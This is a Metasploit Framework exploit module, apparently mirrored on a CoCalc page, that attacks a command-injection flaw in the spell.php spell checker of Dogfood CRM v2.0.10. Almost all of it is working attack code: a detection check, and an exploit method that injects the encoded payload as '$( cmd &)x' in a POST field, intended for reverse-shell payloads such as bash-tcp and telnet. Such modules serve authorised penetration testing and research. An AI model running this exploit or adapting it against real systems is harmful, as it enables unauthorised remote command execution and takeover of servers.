Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/dogfood_spell_exec.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Dogfood CRM spell.php Remote Command Execution',
16
'Description' => %q{
17
This module exploits a previously unpublished vulnerability in the
18
Dogfood CRM mail function which is vulnerable to command injection
19
in the spell check feature. Because of character restrictions, this
20
exploit works best with the double-reverse telnet payload. This
21
vulnerability was discovered by LSO and affects v2.0.10.
22
},
23
'Author' => [
24
'LSO <lso[at]hushmail.com>', # Exploit module
25
'aushack', # Added check code, QA tested ok 20090303, there are no references (yet).
26
],
27
'License' => BSD_LICENSE,
28
'References' => [
29
[ 'OSVDB', '54707' ],
30
[ 'URL', 'http://downloads.sourceforge.net/dogfood/' ],
31
],
32
'Privileged' => false,
33
'Platform' => ['unix'], # aushack - removed win, linux -> untested
34
'Arch' => ARCH_CMD,
35
'Payload' => {
36
'Space' => 1024,
37
'DisableNops' => true,
38
'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
39
'Compat' =>
40
{
41
'PayloadType' => 'cmd cmd_bash',
42
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
43
}
44
},
45
'Targets' => [ ['Automatic', {}], ],
46
'DefaultTarget' => 0,
47
'DisclosureDate' => '2009-03-03',
48
'Notes' => {
49
'Reliability' => UNKNOWN_RELIABILITY,
50
'Stability' => UNKNOWN_STABILITY,
51
'SideEffects' => UNKNOWN_SIDE_EFFECTS
52
}
53
)
54
)
55
56
register_options(
57
[
58
OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']),
59
]
60
)
61
end
62
63
def check
64
res = send_request_raw(
65
{
66
'uri' => normalize_uri(datastore['URIPATH']),
67
}, 1
68
)
69
70
if (res and res.body =~ /Spell Check complete/)
71
return Exploit::CheckCode::Detected
72
end
73
74
return Exploit::CheckCode::Safe
75
end
76
77
def exploit
78
timeout = 1
79
80
cmd = payload.encoded
81
data = "data=#{Rex::Text.uri_encode('$( ' + cmd + ' &)x')}"
82
uri = normalize_uri(datastore['URIPATH'])
83
84
response = send_request_cgi(
85
{
86
'uri' => uri,
87
'method' => "POST",
88
'data' => data
89
},
90
timeout
91
)
92
93
handler
94
end
95
end
96
97